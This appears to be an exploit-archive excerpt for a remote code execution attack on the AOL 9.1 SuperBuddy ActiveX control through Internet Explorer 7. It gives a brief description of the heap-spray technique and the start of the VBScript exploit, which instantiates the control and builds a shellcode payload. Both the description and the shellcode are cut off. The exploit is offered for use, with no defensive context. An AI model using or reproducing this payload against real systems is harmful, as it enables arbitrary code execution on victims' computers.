AOL 9.1 SuperBuddy ActiveX Control SetSuperBuddy() remote code execution exploit

!-- AOL 9.1 SuperBuddy ActiveX Control SetSuperBuddy remote code execution exploit IE7/heap spray version by nine:situations:group::trotzkista Is possible to execute arbitrary code by setting the first argument to an overlong url and the second argument to a 16 bytes long string which overwrite...

AOL 9.1 SuperBuddy SetSuperBuddy() Code Execution

Set obj = CreateObject"Sb.SuperBuddy.1" shellcode = unescape"%u03eb%ueb59%ue805%ufff8%uffff%u4949%u3749%u4949" + "%u4949%u4949%u4949%u4949%u4949%u4949%u5a51%u456a" + "%u5058%u4230%u4231%u6b41%u4141%u3255%u4241%u3241" + "%u4142%u4230%u5841%u3850%u4241%u6d75%u6b39%u494c" +...